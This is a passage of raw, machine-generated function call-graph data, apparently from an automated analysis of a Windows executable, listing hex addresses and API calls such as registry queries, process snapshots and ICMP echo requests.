106955->106943 106956->106949 106957->106948 106958->106951 106959->106949 105512 f41033 105517 f45714 105512->105517 105516 f41042 105525 f4ae03 105517->105525 105521 f4581f 105522 f41038 105521->105522 105533 f45974 8 API calls __fread_nolock 105521->105533 105524 f603f3 29 API calls __onexit 105522->105524 105524->105516 105534 f6015b 105525->105534 105527 f4ae18 105543 f6012b 105527->105543 105529 f45782 105530 f44648 105529->105530 105558 f44674 105530->105558 105533->105521 105535 f6012b ___std_exception_copy 105534->105535 105536 f6014a 105535->105536 105539 f6014c 105535->105539 105552 f651fd 7 API calls 2 library calls 105535->105552 105536->105527 105538 f609bd 105554 f635f4 RaiseException 105538->105554 105539->105538 105553 f635f4 RaiseException 105539->105553 105541 f609da 105541->105527 105544 f60130 ___std_exception_copy 105543->105544 105545 f6014a 105544->105545 105547 f6014c 105544->105547 105555 f651fd 7 API calls 2 library calls 105544->105555 105545->105529 105548 f609bd 105547->105548 105556 f635f4 RaiseException 105547->105556 105557 f635f4 RaiseException 105548->105557 105550 f609da 105550->105529 105552->105535 105553->105538 105554->105541 105555->105544 105556->105548 105557->105550 105559 f44667 105558->105559 105560 f44681 105558->105560 105559->105521 105560->105559 105561 f44688 RegOpenKeyExW 105560->105561 105561->105559 105562 f446a2 RegQueryValueExW 105561->105562 105563 f446c3 105562->105563 105564 f446d8 RegCloseKey 105562->105564 105563->105564 105564->105559 105565 f4e37c 105568 f4b940 105565->105568 105569 f4b95b 105568->105569 105570 f90493 105569->105570 105571 f90445 105569->105571 105591 f4b980 105569->105591 105642 fc6029 217 API calls 2 library calls 105570->105642 105574 f9044f 105571->105574 105576 f9045c 105571->105576 105571->105591 105640 fc64ba 217 API calls 105574->105640 105590 f4bc50 105576->105590 105641 fc6957 217 API calls 2 library calls 105576->105641 105581 f5e6c0 39 API calls 105581->105591 105582 f90726 105582->105582 105584 f4bc7e 105586 f9066f 105649 fc6393 81 API calls 105586->105649 105590->105584 105650 fb3d0b 81 API calls __wsopen_s 105590->105650 105591->105581 105591->105584 105591->105586 105591->105590 105595 f4be10 39 API calls 105591->105595 105599 f4f1e0 105591->105599 105624 f4acbd 105591->105624 105628 f5e67a 39 API calls 105591->105628 105629 f5a955 217 API calls 105591->105629 105630 f60592 5 API calls __Init_thread_wait 105591->105630 105631 f5bb11 105591->105631 105636 f603f3 29 API calls __onexit 105591->105636 105637 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105591->105637 105638 f5f33d 81 API calls 105591->105638 105639 f5f1a4 217 API calls 105591->105639 105643 f4a35b 8 API calls 105591->105643 105644 f9fd46 8 API calls 105591->105644 105645 f4ad69 105591->105645 105595->105591 105619 f4f216 ISource 105599->105619 105600 f60592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 105600->105619 105601 f6012b 8 API calls 105601->105619 105602 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 105602->105619 105603 f952b2 105727 fb3d0b 81 API calls __wsopen_s 105603->105727 105605 f50535 105610 f4ad69 8 API calls 105605->105610 105615 f4f33d ISource 105605->105615 105607 f951e1 105726 fb3d0b 81 API calls __wsopen_s 105607->105726 105608 f94c62 105612 f4ad69 8 API calls 105608->105612 105608->105615 105610->105615 105612->105615 105614 f4ae03 8 API calls 105614->105619 105615->105591 105616 f603f3 29 API calls pre_c_initialization 105616->105619 105618 f4f94e ISource 105725 fb3d0b 81 API calls __wsopen_s 105618->105725 105619->105600 105619->105601 105619->105602 105619->105603 105619->105605 105619->105607 105619->105608 105619->105614 105619->105615 105619->105616 105619->105618 105620 f9509c 105619->105620 105623 f4ad69 8 API calls 105619->105623 105651 f50830 105619->105651 105712 f50cf0 105619->105712 105722 fc7db9 53 API calls __wsopen_s 105619->105722 105723 fc7ef8 65 API calls 105619->105723 105724 fb3d0b 81 API calls __wsopen_s 105620->105724 105623->105619 105625 f4acc8 105624->105625 105626 f4acf7 105625->105626 105627 f4ae35 39 API calls 105625->105627 105626->105591 105627->105626 105628->105591 105629->105591 105630->105591 105632 f6012b 8 API calls 105631->105632 105633 f5bb1e 105632->105633 105634 f4a1d4 8 API calls 105633->105634 105635 f5bb29 105634->105635 105635->105591 105636->105591 105637->105591 105638->105591 105639->105591 105640->105576 105641->105590 105642->105591 105643->105591 105644->105591 105646 f4ad8c __fread_nolock 105645->105646 105647 f4ad7d 105645->105647 105646->105591 105647->105646 105648 f6015b 8 API calls 105647->105648 105648->105646 105649->105590 105650->105582 105652 f50856 105651->105652 105668 f508ce 105651->105668 105653 f95ae7 105652->105653 105654 f50863 105652->105654 105734 fc8305 217 API calls 2 library calls 105653->105734 105661 f95b0b 105654->105661 105664 f5086d 105654->105664 105655 f95adb 105733 fb3d0b 81 API calls __wsopen_s 105655->105733 105657 f95b3c 105662 f95b69 105657->105662 105663 f95b47 105657->105663 105658 f4f1e0 217 API calls 105658->105668 105661->105657 105667 f95b23 105661->105667 105737 fc5e10 105662->105737 105736 fc8305 217 API calls 2 library calls 105663->105736 105665 f4ad69 8 API calls 105664->105665 105689 f50880 ISource 105664->105689 105665->105689 105666 f50a55 105666->105619 105735 fb3d0b 81 API calls __wsopen_s 105667->105735 105668->105658 105668->105666 105669 f958a4 ISource 105668->105669 105676 f50a02 ISource 105668->105676 105677 f9588f 105668->105677 105684 f50994 105668->105684 105692 f50a49 105668->105692 105669->105676 105708 f508c3 ISource 105669->105708 105731 fb3d0b 81 API calls __wsopen_s 105669->105731 105674 f95a08 105687 f4ad69 8 API calls 105674->105687 105674->105689 105676->105655 105676->105674 105676->105689 105676->105708 105732 f5b215 217 API calls 105676->105732 105730 fb3d0b 81 API calls __wsopen_s 105677->105730 105678 f95d60 105682 f95d96 105678->105682 105903 fc7ef8 65 API calls 105678->105903 105680 f95c08 105810 fb1802 8 API calls 105680->105810 105681 f95b8f 105744 fb11b5 105681->105744 105905 f4a35b 8 API calls 105682->105905 105684->105692 105728 f50b40 8 API calls 105684->105728 105685 f95d3e 105879 f47e30 105685->105879 105687->105689 105689->105678 105689->105708 105878 fc7db9 53 API calls __wsopen_s 105689->105878 105691 f95d74 105693 f47e30 52 API calls 105691->105693 105692->105666 105729 fb3d0b 81 API calls __wsopen_s 105692->105729 105706 f95d7c _wcslen 105693->105706 105697 f95d46 _wcslen 105697->105678 105902 f4a35b 8 API calls 105697->105902 105698 f95c1a 105811 f4ab97 8 API calls 105698->105811 105699 f509f5 105699->105676 105699->105692 105703 f95c23 105709 fb11b5 8 API calls 105703->105709 105706->105682 105904 f4a35b 8 API calls 105706->105904 105708->105619 105710 f95c3c 105709->105710 105812 f4c210 105710->105812 105713 f50d0d ISource 105712->105713 105713->105619 105714 f513b2 105713->105714 105716 f50e97 ISource 105713->105716 105717 f967be 105713->105717 105721 f965f2 105713->105721 106619 f5e1db 8 API calls ISource 105713->106619 105714->105716 106621 f5bcc1 39 API calls 105714->106621 105716->105619 105717->105716 106620 f6d2b5 39 API calls 105717->106620 106618 f6d2b5 39 API calls 105721->106618 105722->105619 105723->105619 105724->105618 105725->105615 105726->105615 105727->105615 105728->105699 105729->105708 105730->105669 105731->105676 105732->105676 105733->105653 105734->105689 105735->105708 105736->105689 105738 fc5e2b 105737->105738 105743 f95b74 105737->105743 105739 f6015b 8 API calls 105738->105739 105741 fc5e4d 105739->105741 105740 f6012b 8 API calls 105740->105741 105741->105740 105741->105743 105906 fb112a 8 API calls 105741->105906 105743->105680 105743->105681 105745 fb11c3 105744->105745 105747 f95bb9 105744->105747 105746 f6012b 8 API calls 105745->105746 105745->105747 105746->105747 105748 f519c0 105747->105748 105749 f51a26 105748->105749 105750 f51e60 105748->105750 105752 f51a40 105749->105752 105753 f96b5f 105749->105753 106056 f60592 5 API calls __Init_thread_wait 105750->106056 105907 f51fd0 105752->105907 105754 f96b6b 105753->105754 106015 fc7823 105753->106015 105754->105689 105756 f51e6a 105759 f51eab 105756->105759 106057 f4a1d4 105756->106057 105763 f96b74 105759->105763 105765 f51edc 105759->105765 105760 f51fd0 9 API calls 105762 f51a66 105760->105762 105762->105759 105764 f51a9c 105762->105764 105794 f96b97 105763->105794 106067 fb3d0b 81 API calls __wsopen_s 105763->106067 105764->105763 105788 f51ab8 __fread_nolock 105764->105788 106064 f4a35b 8 API calls 105765->106064 105768 f51ee9 106065 f5e5a1 217 API calls 105768->106065 105769 f51e84 106063 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105769->106063 105772 f96b9c 106068 fb3d0b 81 API calls __wsopen_s 105772->106068 105773 f51bdf 105775 f96bff 105773->105775 105776 f51bec 105773->105776 106070 fc5ecc 53 API calls _wcslen 105775->106070 105777 f51fd0 9 API calls 105776->105777 105779 f51bf9 105777->105779 105782 f96d28 105779->105782 105784 f51fd0 9 API calls 105779->105784 105780 f6012b 8 API calls 105780->105788 105781 f6015b 8 API calls 105781->105788 105782->105794 106071 fb3d0b 81 API calls __wsopen_s 105782->106071 105783 f51f22 106066 f5fdff 8 API calls 105783->106066 105789 f51c13 105784->105789 105787 f4f1e0 217 API calls 105787->105788 105788->105768 105788->105772 105788->105773 105788->105780 105788->105781 105788->105787 105790 f96be0 105788->105790 105788->105794 105789->105782 105792 f4ad69 8 API calls 105789->105792 105795 f51c77 ISource 105789->105795 106069 fb3d0b 81 API calls __wsopen_s 105790->106069 105792->105795 105793 f51fd0 9 API calls 105793->105795 105794->105689 105795->105782 105795->105783 105795->105793 105795->105794 105797 f51d2b ISource 105795->105797 105917 fca3d4 105795->105917 105925 fb63c9 105795->105925 105930 fcaa71 105795->105930 105935 fc9d26 105795->105935 105938 fc0ce2 105795->105938 105963 f5aaf7 105795->105963 105982 fb6376 105795->105982 105989 fbf674 105795->105989 105998 fca6d6 105795->105998 106006 fc9d12 105795->106006 106009 fca2dc 105795->106009 105796 f51dcd 105796->105689 105797->105796 106055 f5e1db 8 API calls ISource 105797->106055 105810->105698 105811->105703 105850 f4c26e 105812->105850 106557 f4b080 9 API calls ISource 105812->106557 105814 f4cf90 106560 fb3d0b 81 API calls __wsopen_s 105814->106560 105816 f908ff 105816->105689 105818 f90a04 105819 f90ab7 105819->105818 105826 f4c3c5 105819->105826 106567 fc5ecc 53 API calls _wcslen 105819->106567 105820 f90f1b 105820->105818 106599 fb3d0b 81 API calls __wsopen_s 105820->106599 105821 f90949 105829 f90a09 105821->105829 105830 f909ad 105821->105830 105840 f90907 105821->105840 105822 f4c3b6 105822->105819 105822->105826 106565 fa7819 8 API calls __fread_nolock 105822->106565 105823 f4cd46 105831 f6015b 8 API calls 105823->105831 105826->105820 105833 f6012b 8 API calls 105826->105833 105839 f4c443 105826->105839 105828 f90a66 106566 fa7792 8 API calls __fread_nolock 105828->106566 106563 fb3d0b 81 API calls __wsopen_s 105829->106563 106561 f5e5a1 217 API calls 105830->106561 105843 f4cd74 __fread_nolock 105831->105843 105835 f4c419 105833->105835 105835->105839 106558 f4b1bd 8 API calls 105835->106558 105837 f90ae8 105837->105826 106568 fa7819 8 API calls __fread_nolock 105837->106568 105838 f90a90 105842 f4f1e0 217 API calls 105838->105842 105846 f90ba2 105839->105846 105870 f4c467 ISource __fread_nolock 105839->105870 106569 f4b23b 105839->106569 105840->105818 106562 fb3d0b 81 API calls __wsopen_s 105840->106562 105841 f6012b 8 API calls 105841->105850 105842->105819 105845 f6015b 8 API calls 105843->105845 105845->105870 105849 f90bb3 105846->105849 105851 f4b23b 8 API calls 105846->105851 105849->105870 106577 f5b96b 8 API calls ISource 105849->106577 105850->105814 105850->105818 105850->105821 105850->105822 105850->105823 105850->105830 105850->105840 105850->105841 105850->105843 105854 f4f1e0 217 API calls 105850->105854 105856 f90a2c 105850->105856 105850->105870 105851->105849 105854->105850 105855 f90d46 105858 f4f1e0 217 API calls 105855->105858 106564 fb3d0b 81 API calls __wsopen_s 105856->106564 105860 f90d70 105858->105860 105860->105818 105863 f4acbd 39 API calls 105860->105863 105861 f90d9b 106596 fb3d0b 81 API calls __wsopen_s 105861->106596 105863->105861 105865 f4a35b 8 API calls 105865->105870 105866 f4b23b 8 API calls 105866->105870 105867 f6012b 8 API calls 105867->105870 105868 f90f00 106598 fa5443 8 API calls ISource 105868->106598 105869 f4be10 39 API calls 105869->105870 105870->105814 105870->105820 105870->105840 105870->105855 105870->105861 105870->105865 105870->105866 105870->105867 105870->105868 105870->105869 105872 f4ad69 8 API calls 105870->105872 105873 f6015b 8 API calls 105870->105873 105874 f4caa9 105870->105874 105876 f4c83c ISource 105870->105876 106578 faf69d 39 API calls 105870->106578 106579 f4ae35 105870->106579 106597 fb3978 8 API calls 105870->106597 105872->105870 105873->105870 105874->105689 105875 f4c853 105875->105689 105876->105875 106559 f5e1c3 8 API calls ISource 105876->106559 105878->105685 105880 f47e45 105879->105880 105896 f47e42 105879->105896 105881 f47e4d 105880->105881 105882 f47e7b 105880->105882 106614 f65516 26 API calls 105881->106614 105885 f47e8d 105882->105885 105892 f85b50 105882->105892 105894 f85a69 105882->105894 106615 f5fe35 51 API calls 105885->106615 105886 f47e5d 105889 f6012b 8 API calls 105886->105889 105887 f85b68 105887->105887 105891 f47e67 105889->105891 105893 f4a1d4 8 API calls 105891->105893 106617 f654d3 26 API calls 105892->106617 105893->105896 105895 f6015b 8 API calls 105894->105895 105901 f85ae2 105894->105901 105897 f85ab2 105895->105897 105896->105697 105898 f6012b 8 API calls 105897->105898 105899 f85ad9 105898->105899 105900 f4a1d4 8 API calls 105899->105900 105900->105901 106616 f5fe35 51 API calls 105901->106616 105902->105678 105903->105691 105904->105682 105905->105708 105906->105741 105908 f52011 105907->105908 105909 f51fed 105907->105909 106072 f60592 5 API calls __Init_thread_wait 105908->106072 105910 f51a50 105909->105910 106074 f60592 5 API calls __Init_thread_wait 105909->106074 105910->105760 105913 f5201b 105913->105909 106073 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105913->106073 105914 f58db7 105914->105910 106075 f60548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105914->106075 105918 fca42f 105917->105918 105924 fca3ef 105917->105924 105919 fca44d 105918->105919 106108 f4b81d 39 API calls 105918->106108 105922 fca4aa 105919->105922 105919->105924 106109 f4b81d 39 API calls 105919->106109 106076 fb009c 105922->106076 105924->105795 105926 f47e30 52 API calls 105925->105926 105927 fb63dc 105926->105927 106138 fae1ac GetFileAttributesW 105927->106138 105929 fb63e6 105929->105795 105931 f47e30 52 API calls 105930->105931 105932 fcaa8d 105931->105932 106142 fadac1 CreateToolhelp32Snapshot Process32FirstW 105932->106142 105934 fcaa9c 105934->105795 106275 fc86e0 105935->106275 105937 fc9d36 105937->105795 105939 fc0d0b 105938->105939 105940 fc0d39 WSAStartup 105939->105940 106380 f4b81d 39 API calls 105939->106380 105942 fc0d4d ISource 105940->105942 105943 fc0d7e 105940->105943 105942->105795 106367 f5c0af 105943->106367 105944 fc0d26 105944->105940 106381 f4b81d 39 API calls 105944->106381 105948 f47e30 52 API calls 105950 fc0d93 105948->105950 105949 fc0d35 105949->105940 106372 f5fac6 WideCharToMultiByte 105950->106372 105952 fc0d9f inet_addr gethostbyname 105952->105942 105953 fc0dbd IcmpCreateFile 105952->105953 105953->105942 105954 fc0dfd 105953->105954 105955 f6015b 8 API calls 105954->105955 105956 fc0e16 105955->105956 106382 f43966 105956->106382 105959 fc0e2c IcmpSendEcho 105962 fc0e76 105959->105962 105960 fc0e55 IcmpSendEcho 105960->105962 105961 fc0f3c IcmpCloseHandle WSACleanup 105961->105942 105962->105961 105964 f47e30 52 API calls 105963->105964 105965 f5ab21 105964->105965 105966 f5bb11 8 API calls 105965->105966 105967 f5ab38 105966->105967 105971 f5af54 _wcslen 105967->105971 106401 f4b81d 39 API calls 105967->106401 105972 f5ba77 43 API calls 105971->105972 105975 f45a63 8 API calls 105971->105975 105976 f5b0b4 105971->105976 105977 f4b81d 39 API calls 105971->105977 105978 f47e30 52 API calls 105971->105978 105979 f47467 8 API calls 105971->105979 106387 f43989 105971->106387 106397 f42f14 105971->106397 106402 f64d78 40 API calls 3 library calls 105971->106402 106403 f469c4 105971->106403 106408 f49c50 8 API calls __fread_nolock 105971->106408 106409 f46a09 8 API calls 105971->106409 105972->105971 105975->105971 105976->105795 105977->105971 105978->105971 105979->105971 105983 f47e30 52 API calls 105982->105983 105984 fb638c 105983->105984 106466 fad98e 105984->106466 105986 fb6394 105987 fb6398 GetLastError 105986->105987 105988 fb63ad 105986->105988 105987->105988 105988->105795 105990 f6015b 8 API calls 105989->105990 105991 fbf685 105990->105991 105992 f43966 8 API calls 105991->105992 105993 fbf68f 105992->105993 105994 f47e30 52 API calls 105993->105994 105995 fbf6a6 GetEnvironmentVariableW 105994->105995 106508 fb1339 8 API calls 105995->106508 105997 fbf6c3 ISource 105997->105795 106000 fca732 105998->106000 106005 fca6f2 105998->106005 105999 fca750 106003 fca7b8 105999->106003 105999->106005 106510 f4b81d 39 API calls 105999->106510 106000->105999 106509 f4b81d 39 API calls 106000->106509 106004 fb009c 58 API calls 106003->106004 106004->106005 106005->105795 106007 fc86e0 119 API calls 106006->106007 106008 fc9d22 106007->106008 106008->105795 106011 fca2ef 106009->106011 106010 f47e30 52 API calls 106012 fca35c 106010->106012 106011->106010 106014 fca2fe 106011->106014 106511 fb15d3 106012->106511 106014->105795 106016 fc787c 106015->106016 106017 fc7862 106015->106017 106019 fc5e10 8 API calls 106016->106019 106552 fb3d0b 81 API calls __wsopen_s 106017->106552 106020 fc7887 106019->106020 106021 f4f1e0 216 API calls 106020->106021 106022 fc78eb 106021->106022 106023 fc7874 106022->106023 106024 fc7986 106022->106024 106028 fc792d 106022->106028 106023->105754 106025 fc798c 106024->106025 106026 fc79da 106024->106026 106553 fb1802 8 API calls 106025->106553 106026->106023 106027 f47e30 52 API calls 106026->106027 106029 fc79ec 106027->106029 106033 fb11b5 8 API calls 106028->106033 106031 f4b159 8 API calls 106029->106031 106034 fc7a10 CharUpperBuffW 106031->106034 106032 fc79af 106554 f4ab97 8 API calls 106032->106554 106036 fc7965 106033->106036 106038 fc7a2a 106034->106038 106037 f519c0 216 API calls 106036->106037 106037->106023 106040 fc7a7d 106038->106040 106041 fc7a31 106038->106041 106039 fc79b7 106043 f4c210 216 API calls 106039->106043 106042 f47e30 52 API calls 106040->106042 106046 fb11b5 8 API calls 106041->106046 106044 fc7a85 106042->106044 106043->106023 106555 f5a921 9 API calls 106044->106555 106047 fc7a5f 106046->106047 106048 f519c0 216 API calls 106047->106048 106048->106023 106049 fc7a8f 106049->106023 106050 f47e30 52 API calls 106049->106050 106051 fc7aaa 106050->106051 106556 f4ab97 8 API calls 106051->106556 106053 fc7aba 106054 f4c210 216 API calls 106053->106054 106054->106023 106055->105797 106056->105756 106058 f4a1e3 _wcslen 106057->106058 106059 f6015b 8 API calls 106058->106059 106060 f4a20b __fread_nolock 106059->106060 106061 f6012b 8 API calls 106060->106061 106062 f4a221 106061->106062 106062->105769 106063->105759 106064->105768 106065->105783 106066->105783 106067->105794 106068->105794 106069->105794 106070->105789 106071->105794 106072->105913 106073->105909 106074->105914 106075->105910 106110 faffd4 106076->106110 106079 fb011d 106126 fb0313 56 API calls __fread_nolock 106079->106126 106080 fb0135 106081 fb019b 106080->106081 106085 fb0145 106080->106085 106083 fb01cb 106081->106083 106084 fb0231 106081->106084 106096 fb00c3 __fread_nolock 106081->106096 106086 fb01fb 106083->106086 106087 fb01d0 106083->106087 106088 fb02da 106084->106088 106089 fb023a 106084->106089 106107 fb017d 106085->106107 106127 fb257f 10 API calls 106085->106127 106086->106096 106131 f4b8eb 39 API calls 106086->106131 106087->106096 106130 f4b8eb 39 API calls 106087->106130 106088->106096 106135 f4b4cf 39 API calls 106088->106135 106090 fb023f 106089->106090 106094 fb02b7 106089->106094 106100 fb0245 106090->106100 106101 fb027e 106090->106101 106094->106096 106134 f4b4cf 39 API calls 106094->106134 106096->105924 106098 fb0151 106128 fb257f 10 API calls 106098->106128 106100->106096 106132 f4b4cf 39 API calls 106100->106132 106101->106096 106133 f4b4cf 39 API calls 106101->106133 106105 fb0168 __fread_nolock 106129 fb257f 10 API calls 106105->106129 106117 fb156e 106107->106117 106108->105919 106109->105922 106111 fb0021 106110->106111 106114 faffe5 106110->106114 106137 f4b81d 39 API calls 106111->106137 106113 f47e30 52 API calls 106113->106114 106114->106113 106115 fb001f 106114->106115 106136 f64d78 40 API calls 3 library calls 106114->106136 106115->106079 106115->106080 106115->106096 106118 fb1579 106117->106118 106119 f6012b 8 API calls 106118->106119 106120 fb1580 106119->106120 106121 fb15ad 106120->106121 106122 fb158c 106120->106122 106124 f6015b 8 API calls 106121->106124 106123 f6015b 8 API calls 106122->106123 106125 fb1595 ___scrt_fastfail 106123->106125 106124->106125 106125->106096 106126->106096 106127->106098 106128->106105 106129->106107 106130->106096 106131->106096 106132->106096 106133->106096 106134->106096 106135->106096 106136->106114 106137->106115 106139 fae1d8 106138->106139 106140 fae1c7 FindFirstFileW 106138->106140 106139->105929 106140->106139 106141 fae1dc FindClose 106140->106141 106141->106139 106152 fae538 106142->106152 106144 fadb0e Process32NextW 106145 fadbc0 FindCloseChangeNotification 106144->106145 106146 fadb07 106144->106146 106145->105934 106146->106144 106146->106145 106147 f4ae03 8 API calls 106146->106147 106148 f4a1d4 8 API calls 106146->106148 106158 f43e34 106146->106158 106200 f46aa4 106146->106200 106209 f5e224 41 API calls 106146->106209 106147->106146 106148->106146 106153 fae543 106152->106153 106154 fae55a 106153->106154 106157 fae560 106153->106157 106210 f66702 GetStringTypeW _strftime 106153->106210 106211 f6664b 39 API calls _strftime 106154->106211 106157->106146 106159 f4ae03 8 API calls 106158->106159 106160 f43e4a 106159->106160 106161 f4ae03 8 API calls 106160->106161 106162 f43e52 106161->106162 106163 f4ae03 8 API calls 106162->106163 106164 f43e5a 106163->106164 106165 f4ae03 8 API calls 106164->106165 106166 f43e62 106165->106166 106167 f83b78 106166->106167 106168 f43e96 106166->106168 106169 f4ad69 8 API calls 106167->106169 106170 f47642 8 API calls 106168->106170 106171 f83b81 106169->106171 106172 f43ea4 106170->106172 106232 f4abe7 106171->106232 106225 f48635 106172->106225 106175 f43eae 106177 f43ed9 106175->106177 106178 f47642 8 API calls 106175->106178 106176 f43f1e 106212 f47642 106176->106212 106177->106176 106179 f43efa 106177->106179 106189 f83ba3 106177->106189 106181 f43ecf 106178->106181 106179->106176 106229 f453e8 106179->106229 106183 f48635 8 API calls 106181->106183 106182 f43f2f 106185 f43f45 106182->106185 106192 f4ad69 8 API calls 106182->106192 106183->106177 106186 f43f59 106185->106186 106193 f4ad69 8 API calls 106185->106193 106190 f43f64 106186->106190 106195 f4ad69 8 API calls 106186->106195 106238 f47467 106189->106238 106196 f4ad69 8 API calls 106190->106196 106199 f43f6f 106190->106199 106191 f83c63 106191->106176 106197 f453e8 8 API calls 106191->106197 106250 f49c50 8 API calls __fread_nolock 106191->106250 106192->106185 106193->106186 106194 f47642 8 API calls 106194->106176 106195->106190 106196->106199 106197->106191 106199->106146 106201 f85409 106200->106201 106202 f46ab6 106200->106202 106269 fa115e 8 API calls __fread_nolock 106201->106269 106259 f46ac7 106202->106259 106205 f46ac2 106205->106146 106206 f85413 106207 f8541f 106206->106207 106208 f4ad69 8 API calls 106206->106208 106208->106207 106209->106146 106210->106153 106211->106157 106213 f47651 106212->106213 106214 f476ae 106212->106214 106213->106214 106216 f4765c 106213->106216 106215 f48635 8 API calls 106214->106215 106222 f4767f __fread_nolock 106215->106222 106217 f47677 106216->106217 106218 f856f7 106216->106218 106251 f47851 8 API calls 106217->106251 106219 f6012b 8 API calls 106218->106219 106221 f85701 106219->106221 106223 f6015b 8 API calls 106221->106223 106222->106182 106224 f85734 106223->106224 106226 f48643 106225->106226 106228 f4864c __fread_nolock 106225->106228 106226->106228 106252 f4b159 106226->106252 106228->106175 106230 f4b159 8 API calls 106229->106230 106231 f43f07 106230->106231 106231->106176 106231->106194 106233 f4abf4 106232->106233 106234 f4ac01 106232->106234 106233->106177 106235 f6012b 8 API calls 106234->106235 106236 f4ac0b 106235->106236 106237 f6015b 8 API calls 106236->106237 106237->106233 106239 f47477 _wcslen 106238->106239 106240 f855fc 106238->106240 106243 f474b2 106239->106243 106244 f4748d 106239->106244 106241 f48635 8 API calls 106240->106241 106242 f85605 106241->106242 106242->106242 106245 f6012b 8 API calls 106243->106245 106258 f47851 8 API calls 106244->106258 106247 f474be 106245->106247 106249 f6015b 8 API calls 106247->106249 106248 f47495 __fread_nolock 106248->106191 106249->106248 106250->106191 106251->106222 106253 f4b16c 106252->106253 106254 f4b169 __fread_nolock 106252->106254 106255 f6012b 8 API calls 106253->106255 106254->106228 106256 f4b177 106255->106256 106257 f6015b 8 API calls 106256->106257 106257->106254 106258->106248 106260 f46b0a __fread_nolock 106259->106260 106261 f46ad6 106259->106261 106260->106205 106261->106260 106262 f8543a 106261->106262 106263 f46afd 106261->106263 106264 f6012b 8 API calls 106262->106264 106270 f46c63 106263->106270 106266 f85449 106264->106266 106267 f6015b 8 API calls 106266->106267 106268 f8547d __fread_nolock 106267->106268 106269->106206 106271 f46c79 106270->106271 106274 f46c74 __fread_nolock 106270->106274 106272 f85514 106271->106272 106273 f6015b 8 API calls 106271->106273 106273->106274 106274->106260 106276 f47e30 52 API calls 106275->106276 106277 fc8717 106276->106277 106301 fc875c ISource 106277->106301 106313 fc945a 106277->106313 106279 fc8a08 106280 fc8bd6 106279->106280 106284 fc8a16 106279->106284 106354 fc966b 59 API calls 106280->106354 106283 fc8be5 106283->106284 106285 fc8bf1 106283->106285 106326 fc860d 106284->106326 106285->106301 106286 f47e30 52 API calls 106304 fc87d0 106286->106304 106291 fc8a4f 106340 f5ffc0 106291->106340 106294 fc8a6f 106347 fb3d0b 81 API calls __wsopen_s 106294->106347 106295 fc8a89 106348 f46d01 8 API calls 106295->106348 106298 fc8a98 106349 f47360 8 API calls 106298->106349 106299 fc8a7a GetCurrentProcess TerminateProcess 106299->106295 106301->105937 106302 fc8ab1 106311 fc8ad9 106302->106311 106350 f50b40 8 API calls 106302->106350 106304->106279 106304->106286 106304->106301 106345 fa4868 8 API calls __fread_nolock 106304->106345 106346 fc8ca4 41 API calls _strftime 106304->106346 106305 fc8c4c 106305->106301 106307 fc8c60 FreeLibrary 106305->106307 106306 fc8ac8 106351 fc9302 74 API calls 106306->106351 106307->106301 106311->106305 106352 f50b40 8 API calls 106311->106352 106353 f4a35b 8 API calls 106311->106353 106355 fc9302 74 API calls 106311->106355 106314 f4b159 8 API calls 106313->106314 106315 fc9475 CharLowerBuffW 106314->106315 106356 fa954d 106315->106356 106319 f4ae03 8 API calls 106320 fc94b1 106319->106320 106321 f47642 8 API calls 106320->106321 106322 fc94c5 106321->106322 106323 f48635 8 API calls 106322->106323 106325 fc94cf _wcslen 106323->106325 106324 fc95e5 _wcslen 106324->106304 106325->106324 106363 fc8ca4 41 API calls _strftime 106325->106363 106327 fc8628 106326->106327 106328 fc8673 106326->106328 106329 f6015b 8 API calls 106327->106329 106332 fc981d 106328->106332 106330 fc864a 106329->106330 106330->106328 106331 f6012b 8 API calls 106330->106331 106331->106330 106333 fc9a32 ISource 106332->106333 106338 fc9841 _strcat _wcslen ___std_exception_copy 106332->106338 106333->106291 106334 f4b81d 39 API calls 106334->106338 106335 f4b4cf 39 API calls 106335->106338 106336 f4b8eb 39 API calls 106336->106338 106337 f47e30 52 API calls 106337->106338 106338->106333 106338->106334 106338->106335 106338->106336 106338->106337 106366 faf5ef 10 API calls _wcslen 106338->106366 106341 f5ffd5 106340->106341 106342 f6006d LoadLibraryExW 106341->106342 106343 f6005b FindCloseChangeNotification 106341->106343 106344 f6003b 106341->106344 106342->106344 106343->106344 106344->106294 106344->106295 106345->106304 106346->106304 106347->106299 106348->106298 106349->106302 106350->106306 106351->106311 106352->106311 106353->106311 106354->106283 106355->106311 106358 fa956d _wcslen 106356->106358 106357 fa965c 106357->106319 106357->106325 106358->106357 106359 fa9661 106358->106359 106360 fa95a2 106358->106360 106359->106357 106365 f5e224 41 API calls 106359->106365 106360->106357 106364 f5e224 41 API calls 106360->106364 106363->106324 106364->106360 106365->106359 106366->106338 106368 f6015b 8 API calls 106367->106368 106369 f5c0c2 106368->106369 106370 f6012b 8 API calls 106369->106370 106371 f5c0ce 106370->106371 106371->105948 106373 f5fb27 106372->106373 106374 f5faf0 106372->106374 106386 f5fe73 8 API calls 106373->106386 106376 f6015b 8 API calls 106374->106376 106377 f5faf7 WideCharToMultiByte 106376->106377 106385 f5fb30 8 API calls __fread_nolock 106377->106385 106379 f5fb1b 106379->105952 106380->105944 106381->105949 106383 f6012b 8 API calls 106382->106383 106384 f43978 106383->106384 106384->105959 106384->105960 106385->106379 106386->106379 106388 f439b4 ___scrt_fastfail 106387->106388 106410 f44dd2 106388->106410 106391 f43a3a 106393 f839c2 Shell_NotifyIconW 106391->106393 106394 f43a58 Shell_NotifyIconW 106391->106394 106414 f45033 106394->106414 106396 f43a6e 106396->105971 106398 f42f76 106397->106398 106399 f42f26 ___scrt_fastfail 106397->106399 106398->105971 106400 f42f45 Shell_NotifyIconW 106399->106400 106400->106398 106401->105971 106402->105971 106404 f6015b 8 API calls 106403->106404 106405 f469e9 106404->106405 106406 f6012b 8 API calls 106405->106406 106407 f469f7 106406->106407 106407->105971 106408->105971 106409->105971 106411 f43a09 106410->106411 106412 f44dee 106410->106412 106411->106391 106444 face59 42 API calls _strftime 106411->106444 106412->106411 106413 f840d9 DestroyIcon 106412->106413 106413->106411 106415 f45050 106414->106415 106434 f45132 106414->106434 106416 f469c4 8 API calls 106415->106416 106417 f4505e 106416->106417 106418 f842ad LoadStringW 106417->106418 106419 f4506b 106417->106419 106422 f842c7 106418->106422 106420 f47467 